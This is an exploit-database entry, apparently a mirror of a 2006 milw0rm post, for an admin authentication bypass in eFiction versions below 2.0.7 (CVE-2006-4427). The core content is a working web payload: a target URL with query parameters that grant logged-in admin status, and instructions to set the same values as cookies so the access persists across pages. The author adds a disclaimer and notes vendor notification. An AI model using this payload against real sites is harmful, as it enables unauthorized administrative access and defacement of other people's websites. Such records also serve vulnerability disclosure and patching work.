[] NeoSense
E X P L O I T S
title author type platform port cve id

eFiction < 2.0.7 - Remote Admin Authentication Bypass

Author: Vipsta
type: webapps
platform: php
port: 
date_added: 2006-08-24 
date_updated:  
verified: 1 
codes: OSVDB-28237;CVE-2006-4427 
tags: 
aliases:  
screenshot_url:  
application_url: 
##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing
these websites under MY name, which is a shame because they ripped it from a private discussion
on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone,
nor act in this type of activity. I suggest whomever is defacing websites under my name stop,
since you would gain more notorioty under your own name.
##########################################

http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1

Use firefox's extension "add n edit cookies" to add these to your cookies so they stick.
(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays with each page)

# milw0rm.com [2006-08-25]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.